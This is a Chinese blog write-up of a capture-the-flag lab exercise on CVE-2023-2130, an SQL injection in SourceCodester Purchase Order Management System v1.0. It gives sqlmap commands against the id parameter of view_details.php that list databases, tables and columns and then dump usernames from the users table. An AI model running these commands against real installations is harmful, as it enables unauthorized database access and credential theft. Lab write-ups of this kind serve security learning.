SourceCodester Purchase Order Management System v1.0 是一个实用的工具,适合希望优化采购流程的企业和组织
靶场界面
直接放sqlmap跑
爆数据库
爆数据表
爆字段
爆内容-用户名
爆内容-密码
sqlmap的md5碰撞
sqlmap所有命令
点击查看代码
爆数据库
python sqlmap.py -u "http://eci-2zea4q7akj7lo8r4mja0.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --dbs
爆指定数据库的数据表
python sqlmap.py -u "http://eci-2zea4q7akj7lo8r4mja0.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db --tables
爆指定数据库的指定数据表的字段列
python sqlmap.py -u "http://eci-2zea4q7akj7lo8r4mja0.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T users --columns
爆指定数据库的指定数据表的指定字段列的内容
python sqlmap.py -u "http://eci-2zea4q7akj7lo8r4mja0.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T users -C "username" --dump
管理员界面
爆flag
参考:
[春秋云镜] CVE-2023-2130-CSDN博客
SourceCodester v1.0 SQL 注入漏洞(CVE-2023-2130)-CSDN博客
标签:sqlmap,2zea4q7akj7lo8r4mja0,cloudeci1,2130,eci,数据表,SourceCodester,2023,CVE From: https://www.cnblogs.com/jasy/p/18343666